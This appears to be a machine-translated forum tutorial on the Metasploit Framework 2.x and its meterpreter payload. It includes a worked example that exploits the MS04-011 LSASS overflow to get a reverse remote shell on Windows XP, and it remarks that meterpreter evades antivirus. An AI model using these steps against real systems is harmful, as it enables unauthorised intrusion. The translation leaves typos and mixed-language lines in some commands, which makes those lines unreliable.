METASPLOIT
Introduce
Metasploit Framework is an environment for testing, attacking and exploiting services. Metasploit It is built from the Perl object-oriented language, with components written in C, assembler, and Python. Metasploit can run on most operating systems: Linux, Windows, MacOS. You can download the program at www.metasploit.com
Metasploit can automatically update starting from version 2.2 onwards, using the msfupdate.bat script in the installation directory.
2) Components of Metasploit
Metasploit support Multiple user interfaces:
console interface Use msfconsole.bat. Msfconsole interface uses the command line to configure, test so faster and more flexible
Web interface Use msfweb.bat to communicate with the user through the web interface
Command line interface : use msfcli.bat
Enviroment
Global Enviroment : implemented via two setg and unsetg statements, the options assigned here are global, included in all exploits.
Temporary Enviroment : implemented via two set and unset statements, this enviroment is only included in the current exploit module, which does not affect other exploit modules.
You can save the enviroment you have configured via the save command. That environment will be saved in /.msf/config and will be loaded back when the user interface is executed
The options that are common to exploit modules such as LPORT, LHOST, PAYLOAD should be defined in Global Enviroment.
msf & gt; setg LPORT 80
msf & gt; seto LHOST 172.16.8.2
3) Use Metasploit framework
1. Select the exploit module: select the program, service error that Metasploit support to exploit
show exploits : see the exploit module that the framework supports
exploit_name : select the exploit module
info exploit_name : see information about the exploit module
You should update the service regularly www.metasploit.com or via the msfupdate.bat script
2. Configure the selected exploit module
show options: Specify which options to configure
set : configure options for that module
Some modules also have advanced options, which you can view by typing show advanceds
Verify the options you have configured:
check : Check that the options have been set correctly.
4. Select target: choose the operating system to perform
show targets : targets provided by that module
: specify target
vd: smf & gt; use windows_ssl_pct
show targets
The exploit will list targets such as winxp, winxp SP1, win2000, win2000 SP1
5. Select the payload
The payload is the code that will run on the remote machine
show payloads : lists the payload of the current exploit module
info payload_name : see details about that payload
set PAYLOAD payload_name Define the payload module name. After selecting the payload, use the show options command to view the options of the payload
show advanced : see the advanced options of the payload
6.Image capture
exploit : command used to execute payload code. Payload will then give you information about the system being exploited
4. Introduction to payload meterpreter
Meterpreter, short for Meta-Interpreter, is an advanced payload available in the Metasploit framework. Its purpose is to provide scripts to exploit, to remote machines. It is written from developers in the form of shared object (DLL) files. Meterpreter and extensible components are executed in memory, not completely written to the disk, so it is possible to avoid detection from antivirus software.
Meterpreter provides a script that we can exploit on remote computers
Allows you to upload and download files from remote machines
Allows you to view remote network information such as IP, route table
Process Allows you to create new processes on the remote machine
: lets see th He believes the system of the remote machine
Use statement
se -m module1, module2, module3 [-p path] [-d]
Use command to load meterpreter expansion module such as: Fs, Net, Process ..
loadlib -f library [-t target] [-lde]
Command to load libraries of remote machines
đọc channel_id [length]
The read command allows you to view the data of the remote machine on the connected channel
write channel_id
The write command writes data to the remote machine
close channel_id
Close the channel that was connected to the remote computer
interact channel_id
Starts a session with the established channel with the remote machine
initcrypt cipher [parameters]
Encrypted data is sent between the host and the remote machine
Use the Fs module Allows you to upload and download files from remote machines
cd directory
Same as commandline cd
getcwd
Indicates the current working directory
ls [filter_string]
lists the directories and files
upload src1 [src2 ...] dst
upload file
download src1 [src2 ...] dst
tập tin tải về
Using the Net module:
ipconfig
route
View the routing table of the remote machine
portfwd [-arv] [-L laddr] [-lport] [-h rhost] [-pportport] [-P]
Allows you to create a forward port between the host and the remote machine
Using the Process module:
execute -f file [-a args] [-Hc]
The execute statement allows you to create a new process on the remote machine and use that process to exploit the data
kill pid1 pid1 pid3
Destroy processes running on remote machines
List the processes of the remote machine
Using the Sys module:
getuid
Indicates the current username of the remote machine
sysinfo
Get information about computername, OS
5) For example
The localhost address 192.168.1.1 will attack the remote machine address 192.168.1.2 via the Lsass_ms04_011 error. This is a stack overflow vulnerability in the Local Security Authority (LSA) service. Lsass.exe is a Microsoft Windows system process that is responsible for local security authentication, Active Directory management. and login policies. Lsass controls the authentication of both client and server.
Msf & gt; use Lsass_ms04_011
Msf & gt; set PAYLOAD win32_reverse_meterpreter
Msf & gt; set RHOST 192.168.1.2
Msf & gt; set LHOST 192.168.1.1
Msf & gt; exploit
Meterpreter & gt; help
Meterpreter & gt; use -m Process // Add the process script
Meterpreter & help; // see meterpreter commands support
Meterpreter & gt; ps // list of processes that the remote machine is running
Meterpreter & kill; // shut down the processes that the remote machine is running
Meterpreter & gt; execute -f cmd -c Attacks using comandline cmd of remote machine
execute: success, process id is 3516.
thực hiện: cấp phát cấp 1 cho tiến trình mới.
meterpreter & gt; interact 1
Interactively: Chuyển đổi lại console trên 1 ...
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C: WINDOWS & gt; echo Meterpreter interactive channel in action
echo Meterpreter interactive channel in action
Meterpreter interactive channel in action
C: WINDOWS & gt; ipconfig
Caught Ctrl-C, close interactive session? [y / N] y
meterpreter & gt;
6) Prevention
Frequently updated Microsoft's patches. For example, for Metasploit to fail to exploit Lsass_ms04_011, you must update Microsoft patches. According to Microsoft, this is a serious error, which is found on almost all Windows operating systems. You should use hotfix number 835732 to patch the problem.
http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
Network administrator and reader thank you:
Viking - (ENS Group) - Adminvietnam ( www.vuevietnam.com/forum have collaborated to submit this article
mail: thanhtung22@gmail.com
